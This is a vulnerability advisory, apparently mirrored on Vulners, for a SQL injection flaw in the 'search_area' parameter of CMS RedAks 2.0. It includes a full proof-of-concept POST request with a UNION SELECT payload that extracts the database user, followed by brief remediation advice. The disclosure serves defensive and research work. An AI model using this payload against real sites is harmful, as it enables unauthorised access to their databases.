Vulners
Lucene search
CMS RedAks 2.0 - SQL Injection vulnerability
============================================
CMS RedAks 2.0 - SQL Injection vulnerability
============================================
Details
=============
Product: CMS RedAks v.2.0
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: http://www.redaks.com/
Advisory-Status: published
Credits
=============
Discovered by: David Vieira-Kurz of MajorSecurity
Original Advisory
=============
http://www.majorsecurity.net/redaks_cms_sql_injection.php
Affected Products:
=============
CMS RedAks v.2.0
Prior versions may also be vulnerable
=============
"CMS RedAks is a web based content management system."
More Details
=============
We at MajorSecurity have discovered some vulnerabilities in CMS RedAks
v.2.0, which can be exploited to conduct sql injection attacks.
Input passed directly to the "search_area" POST parameter in "/search/"
Controller is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code.
Proof of Concept
=============
POST /search/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3)
Gecko/20100401 Firefox/3.6.2 MajorSecurity
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost
Cookie: PHPSESSID=e735166dcb9afcbfaf38d2c1fc41c9d8; cnt_monitor=1440x900;
Content-Type: multipart/form-data;
boundary=---------------------------315562279830303
Content-Length: 365
-----------------------------315562279830303
Content-Disposition: form-data; name="searchExtended"
1
-----------------------------315562279830303
Content-Disposition: form-data; name="search_inall"
avxas
-----------------------------315562279830303
Content-Disposition: form-data; name="search_area"
1'"%20union%20select%201,user%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20/*
-----------------------------315562279830303--
Solution
=============
Web applications should never trust on user generated input and
therefore sanatize all input.
Edit the source code to ensure that input is properly sanitised.
MajorSecurity
=============
MajorSecurity is a German penetrationtesting and security research
company which focuses
on web application security. We offer professional penetrationstest,
security audits,
source code reviews and pci dss compliance tests. Visit us at
http://www.majorsecurity.net/penetrationstest.php
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2010 00:00Current
7.1High risk
Vulners AI Score7.1